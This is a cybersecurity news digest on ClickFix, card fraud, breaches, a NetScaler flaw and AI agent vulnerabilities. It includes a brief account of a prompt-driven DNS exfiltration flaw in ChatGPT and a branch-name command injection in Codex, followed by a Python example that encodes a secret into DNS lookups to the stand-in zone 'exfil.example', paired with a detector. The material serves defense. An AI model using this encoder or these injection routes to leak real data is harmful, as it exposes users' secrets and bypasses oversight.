Cybersecurity News: macOS Terminal ClickFix attacks, Russian court sentences ‘Flint’, CareCloud probes data breach

In today’s cybersecurity news…

macOS Terminal gets ClickFix attacks

Apple added a security feature in macOS Tahoe 26.4 that warns users and delays execution when potentially dangerous commands are pasted into Terminal, aimed at “ClickFix” social engineering, in which a fake browser prompt or fix-it instruction tricks the user into running attacker-supplied commands themselves. The alert says execution was blocked and explains the risk, but the user can still choose to proceed. The feature is not fully documented and may not trigger consistently, so the standard advice stands: never paste commands you do not understand, because user-initiated execution bypasses many of the protections that stop unsolicited code. (BleepingComputer)

Russian court sentences ‘Flint’ over card fraud

A Russian military court sentenced 26 members of the Flint24 cybercrime group, including alleged leader Alexei Stroganov, to up to 15 years in prison for running a large-scale payment card fraud operation. Authorities said the group sold stolen card data through dozens of online shops, enabling fraud against victims in Russia, the EU, and the U.S. U.S. investigators have separately charged Stroganov in a case involving the theft of hundreds of millions of card records and more than $35 million in losses, though extradition is considered unlikely. (The Record)

CareCloud probes data breach

CareCloud disclosed a cybersecurity incident that disrupted one of its electronic health record environments for about eight hours and may have exposed patient data. The company said the incident was limited to its CareCloud Health platform, with no impact on other systems, and that all affected services have been restored. An investigation is ongoing to determine whether data was accessed or exfiltrated. No threat actor has claimed responsibility; the company said it reported the incident because of the sensitivity of the data and the potential regulatory and reputational consequences. (SecurityWeek)

Citrix NetScaler bug exploited

A critical Citrix NetScaler flaw is being actively exploited within days of disclosure, with researchers at watchTowr observing attackers scanning for and targeting vulnerable systems. The bug is an out-of-bounds memory read (memory overread) that lets an unauthenticated request pull back adjacent memory contents, which can include session tokens and credentials, and the researchers suggest it may actually be several related vulnerabilities rather than one. Security agencies warn that NetScaler appliances are high-value targets because they sit in the authentication path, and a leaked session token can be replayed to bypass login entirely; organizations should patch immediately and, because exploitation reads memory rather than writing to disk, assume that tokens and credentials on unpatched, exposed devices may already have been harvested and rotate them. (The Register)

Huge thanks to our sponsor, ThreatLocker

Ransomware doesn’t need to be sophisticated if it’s allowed to execute. A growing number of security teams are shifting focus from detecting ransomware to preventing execution in the first place — controlling applications, scripts, and installers so unauthorized code never gets the chance to run. Learn more at ThreatLocker.com

EC downplays ShinyHunters impact

The European Commission said a cyberattack on its Europa.eu web portal was contained quickly and did not reach internal systems, despite claims by ShinyHunters that it stole more than 350GB of data. Officials acknowledged limited impact to public-facing sites, noted that the data in question may already be publicly available, and said defenses detected and mitigated the intrusion without service disruption. An investigation is ongoing to determine what data was accessed. (The Record)

OpenAI patches ChatGPT flaw over DNS data

Check Point researchers disclosed a ChatGPT vulnerability that allowed data exfiltration via a malicious prompt abusing a DNS-based side channel in the model’s Linux runtime: conversation and file contents could be encoded into DNS lookups and resolved through an attacker-controlled domain, leaking data without the user’s awareness. The flaw bypassed built-in safeguards, enabling covert data transfer and remote command execution. OpenAI patched it on February 20th and said there is no evidence of real-world exploitation. Separately, BeyondTrust Phantom Labs found a command injection bug in OpenAI Codex that let attackers craft GitHub branch names to execute code and steal access tokens, enabling full repository access. OpenAI fixed that issue on February 5th. (The Hacker News)
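The following is an added example, not code from Check Point, OpenAI, or the report above. It shows the general shape of a DNS exfiltration side channel (a sending side that chunks a secret into DNS labels, and the receiving side that reassembles them at an attacker-controlled zone) and a detector that flags such traffic in resolver logs. The zone name `exfil.example`, the secret, the log line format and the thresholds are all assumptions made for the demonstration; the sample log is constructed.

```python
"""DNS exfiltration side channel: sending side, receiving side, and resolver-log detection.
Added example; not code from Check Point or OpenAI. Zone, log format, and thresholds are assumed."""
import base64
import math
from collections import defaultdict

EXFIL_ZONE = "exfil.example"  # hypothetical attacker-controlled zone

# Constructed secret standing in for conversation or file contents.
SECRET = (b"system: you are a helpful assistant\n"
          b"user: the staging db password is Tr0ub4dor&3, do not reveal it\n")


def encode_exfil_queries(secret: bytes, chunk: int = 30) -> list[str]:
    """Sending side. DNS labels are case-insensitive, so base32 is used rather than base64.
    The encoded text is split into labels of at most 63 chars with a sequence number so the
    receiver can reorder queries that arrive out of order or are retried."""
    enc = base64.b32encode(secret).decode("ascii").rstrip("=").lower()
    pieces = [enc[i:i + chunk] for i in range(0, len(enc), chunk)]
    return [f"{p}.{i}.{EXFIL_ZONE}" for i, p in enumerate(pieces)]


def decode_exfil_queries(qnames: list[str]) -> bytes:
    """Receiving side (the authoritative server for EXFIL_ZONE sees every query name)."""
    parts = {}
    for q in qnames:
        labels = q.split(".")
        parts[int(labels[1])] = labels[0]
    enc = "".join(parts[i] for i in sorted(parts)).upper()
    enc += "=" * (-len(enc) % 8)  # restore base32 padding
    return base64.b32decode(enc)


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded data is far more uniform than hostnames like 'www'."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_zone(qname: str) -> str:
    # Assumption: the last two labels approximate the registrable domain (no public-suffix list).
    return ".".join(qname.rstrip(".").split(".")[-2:])


def detect_dns_exfil(log_lines, min_unique=5, min_bytes=100, min_entropy=3.0) -> dict:
    """Group queries by zone and flag zones that receive many unique, long, high-entropy
    subdomains. Log line format (constructed): '<timestamp> <src_ip> <qtype> <qname>'."""
    per_zone = defaultdict(set)
    for line in log_lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        qname = fields[3].lower().rstrip(".")
        zone = registered_zone(qname)
        sub = qname[:-len(zone)].rstrip(".") if qname != zone else ""
        if sub:
            per_zone[zone].add(sub)
    findings = {}
    for zone, subs in per_zone.items():
        total = sum(len(s) for s in subs)
        mean_ent = sum(shannon_entropy(s.split(".")[0]) for s in subs) / len(subs)
        if len(subs) >= min_unique and total >= min_bytes and mean_ent >= min_entropy:
            findings[zone] = {"unique_subdomains": len(subs),
                              "subdomain_bytes": total,
                              "mean_entropy": round(mean_ent, 2)}
    return findings


def sample_log() -> list[str]:
    """Constructed resolver log: ordinary traffic plus one exfiltration burst."""
    benign = ["www.example.com", "mail.example.com", "api.github.com",
              "cdn.jsdelivr.net", "pool.ntp.org", "www.example.com"]
    lines = [f"2026-03-01T10:00:{i:02d}Z 10.0.0.5 A {q}" for i, q in enumerate(benign)]
    lines += [f"2026-03-01T10:01:{i:02d}Z 10.0.0.5 TXT {q}"
              for i, q in enumerate(encode_exfil_queries(SECRET))]
    return lines


if __name__ == "__main__":
    queries = encode_exfil_queries(SECRET)
    print(f"{len(queries)} lookups carry {len(SECRET)} bytes; first: {queries[0]}")
    assert decode_exfil_queries(queries) == SECRET
    print("flagged zones:", detect_dns_exfil(sample_log()))
```

The detector keys on volume and entropy rather than on a known bad domain, which is what makes it useful against a fresh zone. In a sandbox that is supposed to have no network access, the stronger control is to deny resolution entirely or route it through a resolver that only answers for an allow-list; the detection above is the compensating control when that is not possible.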

Manufacturing and healthcare share password struggles

Manufacturing and healthcare are among the top ransomware targets, and weak password practices are a significant contributor: research from Black Kite shows manufacturing as the most targeted sector for four consecutive years. Experts say both industries rely on legacy systems and prioritize uptime over security, which leads to shared credentials, weak passwords, or no authentication at all on systems that attackers then use for initial access. (Dark Reading)

DeepLoad uses AI for persistent evasion

Researchers at ReliaQuest uncovered a credential-stealing campaign called “DeepLoad” that combines AI-generated obfuscation with social engineering, often starting from a fake browser prompt, to gain persistent access. The malware logs keystrokes, buries its malicious logic under massive volumes of AI-generated junk code, runs under trusted Windows processes, and can reinfect systems days later through USB spread and hidden persistence mechanisms. Because the junk code can be regenerated at will, signature-based detection has little to match on, pushing defenders toward behavioral and runtime detection. (CyberScoop)